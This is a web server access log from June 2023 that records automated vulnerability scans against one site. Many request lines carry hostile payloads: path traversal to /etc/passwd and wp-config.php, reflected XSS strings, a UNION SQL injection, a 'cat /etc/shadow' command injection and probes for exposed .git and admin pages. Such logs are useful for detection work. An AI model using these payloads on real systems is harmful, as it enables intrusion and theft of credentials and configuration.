41.186.73.134 - - [17/Jun/2023:22:29:12 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:29:14 +0530] "GET /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:22:29:29 +0530] "POST /xmlpserver/services/XMLPService HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:22:29:30 +0530] "POST /xmlpserver/services/XMLPService HTTP/1.1" 404 1056
41.186.73.134 - - [17/Jun/2023:22:30:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [17/Jun/2023:22:31:40 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:22:31:40 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:22:31:40 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:22:31:40 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:22:31:40 +0530] "GET /goform/activate_process?akey&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&hostid&isv HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:22:31:41 +0530] "GET /goform/activate_process?akey&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&hostid&isv HTTP/1.1" 404 1040
90.151.171.106 - - [17/Jun/2023:22:31:45 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [17/Jun/2023:22:31:45 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:22:31:45 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [17/Jun/2023:22:31:45 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:22:31:47 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:22:31:48 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:22:32:35 +0530] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:22:32:35 +0530] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:22:32:37 +0530] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:22:32:38 +0530] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:22:32:45 +0530] "GET /login.php HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:32:46 +0530] "GET /login.php HTTP/1.1" 404 1012
83.97.73.89 - - [17/Jun/2023:22:33:21 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:33:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:33:38 +0530] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:33:38 +0530] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:22:34:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:36:19 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:37:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:38:32 +0530] "GET /client/index.php HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:22:38:32 +0530] "GET /client/index.php HTTP/1.1" 404 1026
41.186.73.134 - - [17/Jun/2023:22:38:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:40:16 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:22:40:18 +0530] "GET /static../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:21 +0530] "GET /js../.git/config HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:22:40:23 +0530] "GET /images../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:25 +0530] "GET /static../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:26 +0530] "GET /img../.git/config HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:40:28 +0530] "GET /js../.git/config HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:22:40:29 +0530] "GET /css../.git/config HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:40:31 +0530] "GET /images../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:32 +0530] "GET /assets../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:33 +0530] "GET /img../.git/config HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:40:35 +0530] "GET /content../.git/config HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:22:40:37 +0530] "GET /css../.git/config HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:40:37 +0530] "GET /events../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:40 +0530] "GET /assets../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:40 +0530] "GET /media../.git/config HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:40:43 +0530] "GET /lib../.git/config HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:40:43 +0530] "GET /content../.git/config HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:22:40:46 +0530] "GET /events../.git/config HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:22:40:49 +0530] "GET /media../.git/config HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:40:52 +0530] "GET /lib../.git/config HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:22:42:04 +0530] "GET /manager/html HTTP/1.1" 401 2473
98.159.100.141 - - [17/Jun/2023:22:42:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
98.159.100.141 - - [17/Jun/2023:22:42:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:42:40 +0530] "POST /user/login/login HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:22:42:41 +0530] "POST /user/login/login HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:22:42:42 +0530] "GET /user/main HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:42:45 +0530] "GET /user/main HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:22:43:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:43:58 +0530] "GET /apisix/admin/migrate/export HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:22:43:59 +0530] "GET /apisix/admin/migrate/export HTTP/1.1" 404 1048
83.97.73.89 - - [17/Jun/2023:22:44:21 +0530] "GET / HTTP/1.1" 200 11250
87.120.88.58 - - [17/Jun/2023:22:44:34 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:22:44:46 +0530] "GET /static/ueditor/php/controller.php?action=proxy&maxwidth=-1&referer=test&remote=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:22:44:46 +0530] "GET /static/ueditor/php/controller.php?action=proxy&maxwidth=-1&referer=test&remote=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:22:46:09 +0530] "GET /bitrix/rk.php?goto=https://interact.sh HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:11 +0530] "GET /bitrix/redirect.php?event1&event2&event3&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:13 +0530] "GET /bitrix/redirect.php?event3=352513&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:15 +0530] "GET /bitrix/rk.php?goto=https://interact.sh HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:16 +0530] "GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:18 +0530] "GET /bitrix/redirect.php?event1&event2&event3&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:19 +0530] "GET /bitrix/redirect.php?event1=select_product_t1&event2=contributions&goto=https://interact.sh&site_id=s1 HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:20 +0530] "GET /bitrix/redirect.php?event3=352513&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:22 +0530] "GET /bitrix/redirect.php?event1&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:23 +0530] "GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:24 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh&id=28&site_id=s2 HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:22:46:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:46:26 +0530] "GET /bitrix/redirect.php?event1=select_product_t1&event2=contributions&goto=https://interact.sh&site_id=s1 HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:27 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh&id=84&site_id=n1 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:29 +0530] "GET /bitrix/redirect.php?event1&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:30 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh&id=691&site_id=s3 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:32 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh&id=28&site_id=s2 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:33 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh&id=129 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:34 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh&id=84&site_id=n1 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:35 +0530] "GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:37 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh&id=691&site_id=s3 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:37 +0530] "GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:39 +0530] "GET /bitrix/rk.php?event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh&id=129 HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:22:46:41 +0530] "GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:22:46:43 +0530] "GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https://interact.sh HTTP/1.1" 404 1032
83.97.73.89 - - [17/Jun/2023:22:46:48 +0530] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:22:47:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:48:13 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_awdwall HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:48:13 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_awdwall HTTP/1.1" 404 1012
83.97.73.89 - - [17/Jun/2023:22:48:52 +0530] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:22:50:12 +0530] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:22:50:14 +0530] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:22:50:34 +0530] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:22:50:34 +0530] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 1036
83.97.73.89 - - [17/Jun/2023:22:50:37 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:50:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:22:51:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:51:51 +0530] "GET /index.php?p=%22;alert(document.domain);%22&v=d HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:51:51 +0530] "GET /index.php?p=%22;alert(document.domain);%22&v=d HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:52:37 +0530] "GET /plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 404 1068
107.189.31.184 - - [17/Jun/2023:22:52:37 +0530] "GET /plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 404 1068
83.97.73.89 - - [17/Jun/2023:22:54:38 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:54:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:55:15 +0530] "GET /remote/loginredir?redir=javascript:alert(document.domain) HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:55:16 +0530] "GET /remote/loginredir?redir=javascript:alert(document.domain) HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:22:55:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:56:49 +0530] "GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1" 404 992
107.189.31.184 - - [17/Jun/2023:22:56:49 +0530] "GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1" 404 992
83.97.73.89 - - [17/Jun/2023:22:58:09 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:22:58:30 +0530] "GET /_profiler/empty/search/results?limit=10 HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:22:58:31 +0530] "GET /_profiler/empty/search/results?limit=10 HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:22:58:33 +0530] "GET /app_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1" 404 1078
107.189.31.184 - - [17/Jun/2023:22:58:34 +0530] "GET /app_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1" 404 1078
107.189.31.184 - - [17/Jun/2023:22:58:39 +0530] "GET /Visitor/bin/WebStrings.srf?file&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:22:58:39 +0530] "GET /Visitor/bin/WebStrings.srf?file&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1046
41.186.73.134 - - [17/Jun/2023:22:59:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:59:26 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:23:00:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:01:23 +0530] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 1096
107.189.31.184 - - [17/Jun/2023:23:01:23 +0530] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 1096
107.189.31.184 - - [17/Jun/2023:23:01:37 +0530] "GET /plesk-stat/ HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:23:01:37 +0530] "GET /plesk-stat/ HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:23:02:03 +0530] "GET /wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1090
107.189.31.184 - - [17/Jun/2023:23:02:04 +0530] "GET /wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1090
107.189.31.184 - - [17/Jun/2023:23:02:05 +0530] "GET /admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:23:02:06 +0530] "GET /admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:23:02:38 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:23:02:38 +0530] "GET null null" 400 -
83.97.73.89 - - [17/Jun/2023:23:03:15 +0530] "GET /geoserver HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:23:03:24 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:23:03:33 +0530] "GET /geoserver HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:23:04:26 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:07:07 +0530] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:23:07:07 +0530] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:23:07:26 +0530] "GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1" 404 1122
107.189.31.184 - - [17/Jun/2023:23:07:27 +0530] "GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1" 404 1122
41.186.73.134 - - [17/Jun/2023:23:07:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:08:40 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:11:18 +0530] "POST /xmlrpc HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:23:11:23 +0530] "POST /xmlrpc HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:23:11:34 +0530] "GET /mailsms/s?dumpConfig=/&func=ADMIN:appState HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:23:11:35 +0530] "GET /mailsms/s?dumpConfig=/&func=ADMIN:appState HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:23:11:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:12:28 +0530] "GET /?p=1&xsg-format=yyy&xsg-page=pp&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-type=zz HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:23:12:29 +0530] "GET /?p=1&xsg-format=yyy&xsg-page=pp&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-type=zz HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:23:12:30 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:23:12:32 +0530] "GET null null" 400 -
41.186.73.134 - - [17/Jun/2023:23:13:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [17/Jun/2023:23:13:15 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:23:13:15 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:23:13:15 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:23:13:15 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:23:13:20 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:23:13:20 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:23:13:20 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:23:13:20 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:23:14:12 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:23:14:13 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:23:15:19 +0530] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:23:15:19 +0530] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:23:15:53 +0530] "GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1124
107.189.31.184 - - [17/Jun/2023:23:15:53 +0530] "GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1124
41.186.73.134 - - [17/Jun/2023:23:16:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:17:09 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:19:16 +0530] "GET /html/device-id HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:23:19:17 +0530] "GET /html/device-id HTTP/1.1" 404 1022
41.186.73.134 - - [17/Jun/2023:23:20:17 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:20:21 +0530] "GET /ADSearch.cc?methodToCall=search HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:23:20:21 +0530] "GET /ADSearch.cc?methodToCall=search HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:23:21:19 +0530] "GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1" 404 1084
41.186.73.134 - - [17/Jun/2023:23:21:20 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:21:20 +0530] "GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1" 404 1084
107.189.31.184 - - [17/Jun/2023:23:21:21 +0530] "GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:23:21:22 +0530] "GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:23:21:31 +0530] "GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:23:21:32 +0530] "GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:23:22:33 +0530] "GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:23:22:34 +0530] "GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:23:23:01 +0530] "GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:23:23:02 +0530] "GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:23:24:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
141.98.11.207 - - [17/Jun/2023:23:24:58 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:23:25:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
141.98.11.207 - - [17/Jun/2023:23:26:29 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:23:27:22 +0530] "GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:23:27:22 +0530] "GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1" 404 1044
206.189.196.2 - - [17/Jun/2023:23:28:04 +0530] "GET /ui/authentication HTTP/1.1" 404 1028
206.189.196.2 - - [17/Jun/2023:23:28:04 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
107.189.31.184 - - [17/Jun/2023:23:28:36 +0530] "GET /etc/passwd HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:23:28:36 +0530] "GET /etc/passwd HTTP/1.1" 404 1014
41.186.73.134 - - [17/Jun/2023:23:28:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:29:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:30:35 +0530] "GET /listconf?command=conf HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:23:30:36 +0530] "GET /listconf?command=conf HTTP/1.1" 404 1010
